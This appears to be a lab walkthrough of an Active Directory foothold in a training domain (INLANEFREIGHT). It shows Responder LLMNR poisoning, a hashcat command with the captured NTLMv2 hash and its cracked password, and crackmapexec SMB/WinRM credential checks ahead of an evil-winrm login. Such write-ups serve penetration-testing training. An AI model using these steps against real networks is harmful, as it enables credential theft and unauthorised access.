Foothold
After the enumeration we know the hosts and DC. We also have some valid usernames.
Responder
We use responder to perform LLMNR/NBT-NS poisoning to get the hashes. After that we use hashcat to crack the NTLM hash:
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
<SNIP>
AB920::INLANEFREIGHT:2b90f498f617619c:268ab3710df6a46b2296082138e083ed:010100000000000080807217bc4dd80198a9fd96af791551000000000200080036004a004500310001001e00570049004e002d00500049004d003500300048005300500046004a00530004003400570049004e002d00500049004d003500300048005300500046004a0053002e0036004a00450031002e004c004f00430041004c000300140036004a00450031002e004c004f00430041004c000500140036004a00450031002e004c004f00430041004c000700080080807217bc4dd80106000400020000000800300030000000000000000000000000200000c2ef82380450c5c35e0a85fdd7ec2c1b4d7467db93379e10636aa575b9984c570a0010000000000000000000000000000000000009002e0063006900660073002f0049004e004c0041004e0045004600520049004700480054002e004c004f00430041004c00000000000000000000000000:weasalNow we know the creds and have foothold. Lets see if we can access any computers using any services available with our user. First lets try SMB:
crackmapexec smb 172.16.7.50 -u 'AB920' -p 'weasal'
[*] First time use detected
[*] Creating home directory structure
[*] Creating default workspace
[*] Initializing LDAP protocol database
[*] Initializing MSSQL protocol database
[*] Initializing SMB protocol database
[*] Initializing SSH protocol database
[*] Initializing WINRM protocol database
[*] Copying default configuration file
[*] Generating SSL certificate
SMB 172.16.7.50 445 MS01 [*] Windows 10.0 Build 17763 x64 (name:MS01) (domain:INLANEFREIGHT.LOCAL) (signing:False) (SMBv1:False)
SMB 172.16.7.50 445 MS01 [+] INLANEFREIGHT.LOCAL\AB920:weasal
We didn't get anything. So lets try winrm now:
And we see (Pwn3d!).
So with this creds lets log in using evil-winrm into MS01
Last updated
Was this helpful?